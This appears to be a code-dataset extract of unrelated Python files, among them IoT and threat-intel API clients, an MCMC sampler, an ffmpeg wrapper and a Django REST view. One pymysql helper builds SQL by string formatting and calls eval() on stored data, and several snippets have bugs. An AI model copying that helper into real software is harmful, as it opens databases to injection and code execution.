query_params.append(('page', params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/customer/{customerId}/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataDevice', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_devices_by_entity_group_id_using_get(self, entity_group_id, page_size, page, **kwargs): # noqa: E501
"""getDevicesByEntityGroupId # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_devices_by_entity_group_id_using_get(entity_group_id, page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_group_id: entityGroupId (required)
:param str page_size: Page size (required)
:param str page: Page (required)
:param str text_search: textSearch
:param str sort_property: sortProperty
:param str sort_order: sortOrder
:return: PageDataDevice
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, **kwargs) # noqa: E501
return data
def get_devices_by_entity_group_id_using_get_with_http_info(self, entity_group_id, page_size, page, **kwargs): # noqa: E501
"""getDevicesByEntityGroupId # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_group_id: entityGroupId (required)
:param str page_size: Page size (required)
:param str page: Page (required)
:param str text_search: textSearch
:param str sort_property: sortProperty
:param str sort_order: sortOrder
:return: PageDataDevice
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['entity_group_id', 'page_size', 'page', 'text_search', 'sort_property', 'sort_order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'entity_group_id' is set
if ('entity_group_id' not in params or
params['entity_group_id'] is None):
raise ValueError("Missing the required parameter `entity_group_id` when calling `get_devices_by_entity_group_id_using_get`") # noqa: E501
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_devices_by_entity_group_id_using_get`") # noqa: E501
if 'page_size' in params and params['page_size'] < 1.0: # noqa: E501
raise ValueError("Invalid value for parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `1.0`") # noqa: E501
if 'page' in params and params['page'] < 0.0: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `0.0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'entity_group_id' in params:
path_params['entityGroupId'] = params['entity_group_id'] # noqa: E501
query_params = []
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/entityGroup/{entityGroupId}/devices{?textSearch,sortProperty,sortOrder,pageSize,page}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataDevice', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tenant_devices_using_get(self, page_size, page, **kwargs): # noqa: E501
"""getTenantDevices # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_tenant_devices_using_get(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str page_size: pageSize (required)
:param str page: page (required)
:param str type: type
:param str text_search: textSearch
:param str sort_property: sortProperty
:param str sort_order: sortOrder
:return: PageDataDevice
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_tenant_devices_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_tenant_devices_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
return data
def get_tenant_devices_using_get_with_http_info(self, page_size, page, **kwargs): # noqa: E501
"""getTenantDevices # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_tenant_devices_using_get_with_http_info(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str page_size: pageSize (required)
:param str page: page (required)
:param str type: type
:param str text_search: textSearch
:param str sort_property: sortProperty
:param str sort_order: sortOrder
:return: PageDataDevice
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_tenant_devices_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_tenant_devices_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/tenant/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataDevice', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_devices_using_get(self, page_size, page, **kwargs): # noqa: E501
"""getUserDevices # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_user_devices_using_get(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str page_size: pageSize (required)
:param str page: page (required)
:param str type: type
:param str text_search: textSearch
:param str sort_property: sortProperty
:param str sort_order: sortOrder
:return: PageDataDevice
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_user_devices_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_user_devices_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
return data
def get_user_devices_using_get_with_http_info(self, page_size, page, **kwargs): # noqa: E501
"""getUserDevices # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_user_devices_using_get_with_http_info(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str page_size: pageSize (required)
:param str page: page (required)
:param str type: type
:param str text_search: textSearch
:param str sort_property: sortProperty
:param str sort_order: sortOrder
:return: PageDataDevice
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'page_size' is set
if ('page_size' not in params or
params['page_size'] is None):
raise ValueError("Missing the required parameter `page_size` when calling `get_user_devices_using_get`") # noqa: E501
# verify the required parameter 'page' is set
if ('page' not in params or
params['page'] is None):
raise ValueError("Missing the required parameter `page` when calling `get_user_devices_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'text_search' in params:
query_params.append(('textSearch', params['text_search'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/user/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDataDevice', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def save_device_using_post(self, device, **kwargs): # noqa: E501
"""saveDevice # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.save_device_using_post(device, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Device device: device (required)
:param str access_token: accessToken
:param str entity_group_id: entityGroupId
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.save_device_using_post_with_http_info(device, **kwargs) # noqa: E501
else:
(data) = self.save_device_using_post_with_http_info(device, **kwargs) # noqa: E501
return data
def save_device_using_post_with_http_info(self, device, **kwargs): # noqa: E501
"""saveDevice # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.save_device_using_post_with_http_info(device, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Device device: device (required)
:param str access_token: accessToken
:param str entity_group_id: entityGroupId
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device', 'access_token', 'entity_group_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'device' is set
if ('device' not in params or
params['device'] is None):
raise ValueError("Missing the required parameter `device` when calling `save_device_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'access_token' in params:
query_params.append(('accessToken', params['access_token'])) # noqa: E501
if 'entity_group_id' in params:
query_params.append(('entityGroupId', params['entity_group_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'device' in params:
body_params = params['device']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/device{?accessToken,entityGroupId}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Device', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
8,133 | a505cc0e382554d65447a3fe3a56fac43c1964f2 | import datetime
import json
import logging
import requests
from lib.crits.exceptions import CRITsOperationalError
from lib.crits.vocabulary.indicators import IndicatorThreatTypes as itt
from lib.crits.vocabulary.indicators import IndicatorAttackTypes as iat
log = logging.getLogger()
class CRITsAPI():
def __init__(self, api_url='', api_key='', username='', verify=True,
proxies={}):
self.url = api_url
if self.url[-1] == '/':
self.url = self.url[:-1]
self.api_key = api_key
self.username = username
self.verify = verify
self.proxies = proxies
def get_object(self, obj_id, obj_type):
type_trans = self._type_translation(obj_type)
get_url = '{}/{}/{}/'.format(self.url, type_trans, obj_id)
params = {
'username' : self.username,
'api_key' : self.api_key,
}
r = requests.get(get_url, params=params, proxies=self.proxies, verify=self.verify)
if r.status_code == 200:
return json.loads(r.text)
else:
print('Status code returned for query {}, '
'was: {}'.format(get_url, r.status_code))
return None
def add_indicator(self, source = '', reference = '', method = '',
campaign = None, confidence = None, bucket_list = [], ticket = '',
add_domain = True, add_relationship = True,
indicator_confidence = 'unknown', indicator_impact = 'unknown',
type = None, threat_type = itt.UNKNOWN, attack_type = iat.UNKNOWN,
value = None, description = ''):
# Time to upload these indicators
data = {
'api_key' : self.api_key,
'username' : self.username,
'source' : source,
'reference' : reference,
'method' : '',
'campaign' : campaign,
'confidence' : confidence,
'bucket_list' : bucket_list,
'ticket' : ticket,
'add_domain' : True,
'add_relationship' : True,
'indicator_confidence' : indicator_confidence,
'indicator_impact' : indicator_impact,
'type' : type,
'threat_type' : threat_type,
'attack_type' : attack_type,
'value' : value,
'description' : description,
}
r = requests.post("{0}/indicators/".format(self.url), data=data,
verify=self.verify, proxies=self.proxies)
if r.status_code == 200:
log.debug("Indicator uploaded successfully - {}".format(value))
ind = json.loads(r.text)
return ind
return None
def has_relationship(self, left_id, left_type, right_id, right_type,
rel_type='Related To'):
data = self.get_object(left_id, left_type)
if not data:
raise CRITsOperationalError('Crits Object not found with id {} and '
'type {}'.format(left_id, left_type))
if not 'relationships' in data:
return False
for relationship in data['relationships']:
if relationship['relationship'] != rel_type:
continue
if relationship['value'] != right_id:
continue
if relationship['type'] != right_type:
continue
return True
return False
def forge_relationship(self, left_id, left_type, right_id, right_type,
rel_type, rel_date='', rel_confidence='high',
rel_reason=''):
if not rel_date:
rel_date = datetime.datetime.now()
type_trans = self._type_translation(left_type)
submit_url = '{}/{}/{}/'.format(self.url, type_trans, left_id)
headers = {
'Content-Type' : 'application/json',
}
params = {
'api_key' : self.api_key,
'username' : self.username,
}
data = {
'action' : 'forge_relationship',
'right_type' : right_type,
'right_id' : right_id,
'rel_type' : rel_type,
'rel_date' : rel_date,
'rel_confidence' : rel_confidence,
'rel_reason' : rel_reason
}
r = requests.patch(submit_url, params=params, data=data,
proxies=self.proxies, verify=self.verify)
if r.status_code == 200:
log.debug('Relationship built successfully: {0} <-> '
'{1}'.format(left_id, right_id))
return True
else:
log.error('Error with status code {0} and message {1} between '
'these indicators: {2} <-> '
'{3}'.format(r.status_code, r.text, left_id, right_id))
return False
def add_campaign_to_object(self, id, type, campaign, confidence, analyst,
date, description):
# TODO: Make sure the object does not already have the campaign
# Return if it does. Add it if it doesn't
obj = getattr(self.db, type)
result = obj.find( { '_id' : id, 'campaign.name' : campaign } )
if result:
import pdb
pdb.set_trace()
def _type_translation(self, str_type):
if str_type == 'Indicator':
return 'indicators'
if str_type == 'Domain':
return 'domains'
if str_type == 'IP':
return 'ips'
if str_type == 'Sample':
return 'samples'
if str_type == 'Event':
return 'events'
if str_type == 'Actor':
return 'actors'
if str_type == 'Email':
return 'emails'
if str_type == 'Backdoor':
return 'backdoors'
raise CRITsOperationalError('Invalid object type specified: '
'{}'.format(str_type))
|
8,134 | f4e45c19105d4ee1520acc0cd61dadfe27904d0f | from sklearn.base import BaseEstimator
class movingAverage(BaseEstimator):
'''Implements a moving average.'''
def __init__(self, lag):
self.lag = lag
def movingAverage(self, periods=5):
'''Implements a naiveLV forecast.'''
try:
# sets data
x = self.data['Values']
d = self.data.index
# sets variables
N = x.size
f = np.zeros((N,))
p = int(periods)
# check history
if self.length < p:
print('Moving Average: Not enough data for %s periods' % str(p))
return False
# forecast
f[0:p] = x[0:p]
for i in range(p, N):
# ex-post
if d[i] <= self.maxDate:
f[i] = x[i - p:i].mean()
# ex-ante
else:
f[i] = f[i - 1]
# truncate 0s
if self.truncate:
f[f < 0] = 0
# set name
colName = 'Moving Average %s' % p
# add to data
self.data[colName] = f
return True
except Exception, e:
self.raiseError('Error in Moving Average: ' + str(e)) |
8,135 | c2f39e33030cbe7c5d4827b47fb28d7604bdbc6d | #Write your function here
def over_nine_thousand(lst):
sum = 0
for number in lst:
sum += number
if (sum > 9000):
break
return sum
#Uncomment the line below when your function is done
print(over_nine_thousand([8000, 900, 120, 5000]))
#9020 |
8,136 | 4c5db1af9fd1c9b09f6e64a44d72351807c0f7a5 | from functools import reduce
from math import (log, sqrt)
import matplotlib.pyplot as plt
import matplotlib.pylab as mlab
import numpy
import random
import scipy.stats
class Node:
def __init__(
self,
name,
val=None,
observed=False,
candidate_standard_deviation=1,
save_samples=False
):
self.name = name
self.val = val
self.observed = observed
self.candidate_standard_deviation = candidate_standard_deviation
self.children = []
self.posteriors = []
self.rejected = 0
self.stayed = 0
self.accepted = 0
#if save_samples:
# self.file = open(self.name, 'w')
#else:
# self.file = None
def likelihood(self):
raise NotImplementedError
def complete_conditional(self, target):
return reduce(
lambda l, child: l + child.likelihood(),
self.children,
self.likelihood()
)
def save_sample(self, val):
if self.file:
self.file.write('{}\n'.format(self.val))
def sample(self, isBurn=False):
if self.observed:
#self.save_sample()
return self.val
# get a candidate value
cand = numpy.random.normal(self.val, self.candidate_standard_deviation)
cand = self.cleanse_val(cand)
#print(self.name, 'cand', cand)
if not self.in_support(cand):
#print('*****', self.name, 'reject', cand)
if not isBurn:
self.posteriors.append(self.val)
self.rejected = self.rejected + 1
self.stayed = self.stayed + 1
#self.save_sample()
return self.val
old_val = self.val
reject_likelihood = self.likelihood(old_val)
accept_likelihood = self.likelihood(cand)
# factor in the children with the curernt value
for child in self.children:
reject_likelihood += child.likelihood()
# get the likelihood of the candidate value
self.val = cand
for child in self.children:
accept_likelihood += child.likelihood()
u = log(random.random())
#print(self.name, 'r', reject_likelihood)
#print(self.name, 'a', accept_likelihood)
#print(self.name, 'u', u)
# set it back if staying is more likely
if u >= accept_likelihood - reject_likelihood:
#print(self.name, 'set it back')
self.val = old_val
if not isBurn:
self.stayed = self.stayed + 1
else:
#print(self.name, 'keep the cand', cand)
if not isBurn:
self.accepted = self.accepted + 1
if not isBurn:
self.posteriors.append(self.val)
#self.save_sample()
return self.val
def cleanse_val(self, val):
return val
# Need a function to handle the Add node's value retrieval
def value(self):
return self.val
def add_child(self, child):
self.children.append(child)
def mixplot(self, write=False):
if (len(self.posteriors) == 0):
return
xs, ys = zip(*enumerate(self.posteriors))
plt.plot(xs, ys)
if write:
plt.savefig(self.name + '-mixplot.png')
plt.close()
else:
plt.show()
def plot_posterior(self, write=False):
if (len(self.posteriors) == 0):
return
#sample_min = min(self.posteriors)
#sample_max = max(self.posteriors)
#xs = mlab.frange(sample_min, sample_max, (sample_max - sample_min) / 100)
#ys = [self.pdf(x) for x in xs]
#plt.plot(xs, ys, label='Priot Dist ' + self.name)
#plt.title('Prior Dist {}:{}'.format(self.name, self.candidate_standard_deviation))
plt.title('Posterior {}'.format(self.name))
plt.hist(self.posteriors, bins=30, normed=True, label="Posterior Dist " + self.name)
if write:
plt.savefig(self.name + '-posterior.png')
plt.close()
else:
plt.show()
def __add__(self, other):
return Add(self, other)
def __pow__(self, other):
return Power(self, other)
class Add(Node):
def __init__(self, *args):
def map_args(n):
if isinstance(n, Node):
return n
else:
return Fixed('Fixed ({})'.format(n), val=n)
self.parents = [ map_args(n) for n in list(args)]
Node.__init__(
self,
':'.join([ p.name for p in self.parents ]) + ' (Add)',
)
def add_child(self, child):
for p in self.parents:
p.add_child(child)
def value(self):
return reduce(lambda total, p: total + p.value(), self.parents, 0)
# The purpose of this node is to just have something that gives a fixed value
# With a probability of 1. This is useful for priors.
class Fixed(Node):
def __init__(self, name, val=None):
Node.__init__(
self,
name + ' (Fixed)',
val=val
)
def likelihood(self):
# It's in log space, remember
return 0
class Power(Node):
def __init__(self, base, exponent):
if isinstance(base, Node):
self.base = base
else:
self.base = Fixed('base {}'.format(base), val=base)
if isinstance(exponent, Node):
self.exponent = exponent
else:
self.exponent = Fixed('exponent {}'.format(exponent), val=exponent)
name = '{}:{} (Pow)'.format(self.base.name, self.exponent.name)
Node.__init__(
self,
name,
)
self.parents = [ self.base, self.exponent ]
def add_child(self, child):
for p in self.parents:
p.add_child(child)
def value(self):
return self.base.value() ** self.exponent.value()
|
8,137 | 575768c200ad81f878c132d68569c84f497091f2 | import xml.etree.ElementTree as ET
class Stage:
def __init__(
self, costumes,
sounds, variables,
blocks, scripts,
sprites
):
self.costumes = costumes
self.sounds = sounds
self.variables = variables
self.blocks = blocks
self.scripts = scripts
self.sprites = sprites
class Sprite:
def __init__(
self, name : str,
index : str, xCoord : int,
yCoord : int, heading : int,
scale : float, volume : int,
pan : int, rotation : int,
draggable : bool, hidden : bool,
costumes : str, color : (float, float, float),
pen : str, id : int
):
self.name = name
self.index = index
self.coords = xCoord, yCoord
self.heading = heading
self.scale = scale
self.volume = volume
self.pan = pan
self.rotation = rotation
self.draggable = draggable
self.hidden = hidden
self.costumes = costumes
self.color = color
self.pen = pen
self.id = id
|
8,138 | 163475bbe8a5b6eb161e2bb7e9b9a9a3ea0879d2 | import logging
from subprocess import Popen, PIPE
from .exceptions import VideoEncodingError, WrongVideoTypeError
# TODO: Create a switchable encoding engine.
logger = logging.getLogger('video.encoding')
cmd_ffmpeg = [
'ffmpeg',
'-i',
]
cmd_mp4 = [
'-vf', 'scale=640:360',
'-vcodec', 'h264',
'-acodec', 'aac',
'-y',
]
cmd_webm = [
'-vf', 'scale=640:360',
'-c:v', 'libvpx-vp9',
'-pix_fmt', 'yuv420p',
'-y',
]
# cmd_webm = [
# '-c:v'
# '-vf', 'scale=640:360',
# '-vcodec', 'libvpx',
# '-acodec', 'libvorbis',
# '-y',
# ]
cmd_jpg = [
'-frames', '1',
'-s', '640x360',
'-ss', '1',
'-y',
]
codecs = {
'jpg': cmd_jpg,
'mp4': cmd_mp4,
'webm': cmd_webm,
}
def _run_cmd(cmds):
try:
return Popen(
cmds,
shell=False,
close_fds=True,
stdin=PIPE,
stdout=PIPE,
stderr=PIPE,
)
except OSError as ex:
raise VideoEncodingError('Video running error.') from ex
def encode_video_file(src_filname, dst_filename, file_type):
logger.info(
'Source file: %s, Destination file: %s, File Type: %s',
src_filname, dst_filename, file_type
)
try:
cmd = codecs[file_type]
except IndexError:
raise WrongVideoTypeError('Wrong video type.')
process = _run_cmd(
cmd_ffmpeg + [src_filname] + cmd + [dst_filename],
)
# TODO: timeout handling here.
stdout, stderr = process.communicate()
returncode = process.returncode
if returncode != 0:
logger.error(
'ffmpeg returncode %d, args: %s, output: %s',
returncode,
process.args,
stderr.decode(),
)
raise VideoEncodingError('Video encoding error.')
return returncode
|
8,139 | 80ad4459436e2e1cc44509e7dae18d1539bf2bc0 | import pymysql
class DB:
def __init__(self, host='localhost', port=3306, db_='test', user='wj',
passwd='', charset='utf8'):
self.db = db_
self.conn = pymysql.connect(host=host, port=port, db=db_, user=user, passwd=passwd, charset=charset)
self.cur = self.conn.cursor(cursor=pymysql.cursors.DictCursor)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.conn.commit()
self.cur.close()
self.conn.close()
def write(self, data):
sql = "INSERT INTO {}({}) VALUES ('%s')".format('data', 'a') % data
self.cur.execute(sql)
self.conn.commit()
def read(self):
sql = "SELECT * FROM {}".format('data')
self.cur.execute(sql)
results = self.cur.fetchall()
return results[0]['a']
if __name__ == '__main__':
test = [1, 2, 3, 4, 5, 6, 7]
with DB() as db:
db.write(str(test))
a = eval(db.read())
print(a[2:])
|
8,140 | 47e9b73fc7f6b3c8295e78d0cdb5aa51ca4c5f8d | from rest_framework.generics import GenericAPIView
from rest_framework.response import Response
from rest_framework.status import HTTP_400_BAD_REQUEST, HTTP_404_NOT_FOUND
from ...models.brand import Brand
from ...models.product import type_currency_choices, type_condition_choices, User, Product
from ...models.product_color import color_choices, Product_Color
from ...models.product_size import type_size_choices, Product_Size
from ...models.product_image import Product_Image
from ...models.product_specification import Product_Specification
from ...models.product_platform import Product_Platform
from ...models.product_recommended_use import Product_Recommended_Use
from ...models.product_terms_condition import Product_Terms_Condition
from ...serilaizers.products.updateSerializer import UpdateSerializer
from ...serilaizers.products.specificationSerializer import SpecificationSerializer
from ...serilaizers.products.imageSerializer import ImageSerializer
from ...serilaizers.products.colorSerializer import ColorSerializer
from ...serilaizers.products.platformSerializer import PlatformSerializer
from ...serilaizers.products.recommendedUseSerializer import RecommendedUseSerializer
from ...serilaizers.products.sizeSerializer import SizeSerializer
from ...serilaizers.products.termConditionSerializer import TermConditionSerializer
class UpdateProduct(GenericAPIView):
serializer_class = UpdateSerializer
_product_obj = None
_brands = Brand.objects.values("id", "name")
def get(self, request, *args, **kwargs):
data = self.get_queryset()
extract_sp = self.extract_filter_data(Product_Specification.objects.values(
"name", "value").filter(product=data.id))
extract_img = self.extract_filter_data(
Product_Image.objects.values('image').filter(product=data.id))
if data:
return Response(self.get_data({
"product": data,
"specific": extract_sp,
"img": extract_img
}))
else:
return Response({"errors": False}, status=HTTP_404_NOT_FOUND)
def extract_filter_data(self, data):
arr = []
for i in data:
arr.append(i)
return arr
def get_extra_data(self, id):
extra_data = {}
pl = Product_Platform.objects.values(
'platform').filter(product=id)
col = Product_Color.objects.values('color').filter(product=id)
siz = Product_Size.objects.values(
'size', 'type_size').filter(product=id)
recom = Product_Recommended_Use.objects.values(
'recommended_use').filter(product=id)
terms = Product_Terms_Condition.objects.values(
'terms_condition').filter(product=id)
if pl.exists():
extra_data['platform'] = self.extract_filter_data(pl)
if col.exists():
extra_data['color'] = self.extract_filter_data(col)
if siz.exists():
extra_data['size'] = self.extract_filter_data(siz)
if recom.exists():
extra_data['recom_use'] = self.extract_filter_data(recom)
if terms.exists():
extra_data['term_condition'] = self.extract_filter_data(terms)
if extra_data:
return extra_data
else:
return False
def get_queryset(self):
try:
return Product.objects.get(id=self.kwargs['pk'])
except:
return False
def put(self, request, *args, **kwargs):
self._product_obj = self.get_queryset()
data = self.prepare_data(self.request.data, self.request.FILES)
main = self.validate_main_data(data)
if 'errors' in main:
return Response(main['errors'], status=HTTP_400_BAD_REQUEST)
else:
extra = self.validate_extra_data(data)
if extra:
if 'errors' in extra:
return Response(extra['errors'], status=HTTP_400_BAD_REQUEST)
else:
main = self.update_main_data(data, main)
self.update_extra_data(data, extra)
return Response(self.get_data(main))
self.update_extra_data(data, False)
main = self.update_main_data(data, main)
return Response(self.get_data(main))
def get_data(self, main):
return {
"user": User.objects.values('id', 'username').get(username="root"),
"name": main['product'].title,
"brand": main['product'].brand.id,
"quantity": main['product'].quantity,
"price": main['product'].price,
"currency": main['product'].currency,
"condition": main['product'].condition,
"description": main['product'].description,
"brands": self._brands,
"conditions": type_condition_choices,
"currencys": type_currency_choices,
"colors": color_choices,
"sizes": type_size_choices,
"specific": self.extract_filter_data(main['specific']),
"images": self.extract_filter_data(main['img']),
"extra_data": self.get_extra_data(main['product'].id)
}
def prepare_data(self, data, img_data=None):
# prepared the data extract all data from request and loads using json
# extract images from request files and
# return data as a dict
from json import loads
data = data['data']
data = loads(data)
data['img_current'] = {
i.split("_")[2]: data['img_current'][i] for i in data['img_current']}
if len(img_data) > 0:
img = {i.split("_")[1]: img_data[i] for i in img_data}
data['images'] = img
return data
def update_main_data(self, data, ser_data):
pro = ser_data['product'].update(self._product_obj, data)
for i in data['specific']:
if 'current' in i:
if i['current'] != i['name']:
ser_data['specific'].update(Product_Specification.objects.get(
product=self._product_obj.id, name=i['current']), i)
else:
i['product'] = self._product_obj
ser_data['specific'].create(i)
if 'images' in data:
img = data['images']
for i in img['images']:
ser_data['image'].update(
Product_Image.objects.get(
